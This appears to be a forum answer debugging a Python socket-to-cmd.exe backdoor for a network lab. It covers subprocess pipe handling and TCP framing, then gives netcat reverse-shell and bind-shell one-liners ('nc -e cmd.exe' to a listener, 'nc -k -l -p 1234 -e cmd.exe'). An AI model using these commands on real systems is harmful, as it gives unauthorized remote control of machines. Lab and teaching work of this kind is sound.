Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
data = s.recv(1024)
if (data == "") or (data=="quit"):
proc.stdin.write('%s\n' % data)
remainder = proc.communicate()
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this list, you're calling
proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get
ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate
cmd.exe shell instance, you have to move the
proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call
communicate; you have to write to
stdin, read from
stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a
cd \Users\me\Documents in the first command, then
dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of
C:\python27\Tools rather than
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on
s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a
select, because the pipes aren't sockets. So, the only real option is to create a reader thread for
stdout and another one for
stderr, or to get one of the async subprocess libraries off PyPI, or to use
twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to
communicate, you can see how the threading should work.
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each
s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one
recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this:
makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
data = s.recv(1024)
… just do this:
f = s.makefile()
data = f.readline()
You just need to remember to
s later (or
s right after the
f later). A more idiomatic use is:
with s.makefile() as f:
for data in f:
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with
apt-get netcat or
apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to
cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add
-t to the backdoor server, and just connect up with
telnet instead of